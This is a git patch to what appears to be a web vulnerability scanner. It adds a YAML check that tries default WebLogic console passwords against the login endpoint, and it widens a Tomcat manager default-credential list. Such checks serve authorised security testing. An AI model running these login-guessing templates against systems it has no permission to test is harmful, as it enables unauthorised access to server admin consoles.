From 3d3ecac605ba274390b5ab6fda50eaa4d249d0d0 Mon Sep 17 00:00:00 2001
From: canc3s <cances@foxmail.com>
Date: Mon, 21 Jun 2021 17:22:27 +0800
Subject: [PATCH] add weblogic-console-weak

add weblogic-console-weak
---
 .../pocs/poc-yaml-weblogic-console-weak.yml   | 29 +++++++++++++++++++
 ...nager-week.yml => tomcat-manager-weak.yml} |  8 +++--
 2 files changed, 35 insertions(+), 2 deletions(-)
 create mode 100644 WebScan/pocs/poc-yaml-weblogic-console-weak.yml
 rename WebScan/pocs/{tomcat-manager-week.yml => tomcat-manager-weak.yml} (88%)

diff --git a/WebScan/pocs/poc-yaml-weblogic-console-weak.yml b/WebScan/pocs/poc-yaml-weblogic-console-weak.yml
new file mode 100644
index 0000000..99b5151
--- /dev/null
+++ b/WebScan/pocs/poc-yaml-weblogic-console-weak.yml
@@ -0,0 +1,29 @@
+name: poc-yaml-weblogic-console-weak
+sets:
+  username:
+    - weblogic
+  password:
+    - weblogic
+    - weblogic1
+    - welcome1
+    - Oracle@123
+    - weblogic123
+  payload:
+    - UTF-8
+rules:
+  - method: HEAD
+    path: /console/j_security_check
+    follow_redirects: false
+    expression: |
+      response.status == 302  && response.headers['Set-Cookie'].contains("ADMINCONSOLESESSION")
+  - method: POST
+    path: /console/j_security_check
+    follow_redirects: false
+    headers:
+      Content-type: application/x-www-form-urlencoded
+    body: |
+      j_username={{username}}&j_password={{password}}&j_character_encoding={{payload}}
+    expression: |
+      !response.body.bcontains(b"LoginForm.jsp")
+detail:
+  author: shadown1ng(https://github.com/shadown1ng)
\ No newline at end of file
diff --git a/WebScan/pocs/tomcat-manager-week.yml b/WebScan/pocs/tomcat-manager-weak.yml
similarity index 88%
rename from WebScan/pocs/tomcat-manager-week.yml
rename to WebScan/pocs/tomcat-manager-weak.yml
index c11d349..b167851 100644
--- a/WebScan/pocs/tomcat-manager-week.yml
+++ b/WebScan/pocs/tomcat-manager-weak.yml
@@ -1,12 +1,16 @@
-name: poc-yaml-tomcat-manager-week
+name: poc-yaml-tomcat-manager-weak
 sets:
   username:
     - tomcat
     - admin
+    - root
+    - manager
   password:
-    - tomcat
+    - ""
     - admin
+    - tomcat
     - 123456
+    - root
   payload:
     - base64(username+":"+password)
 rules: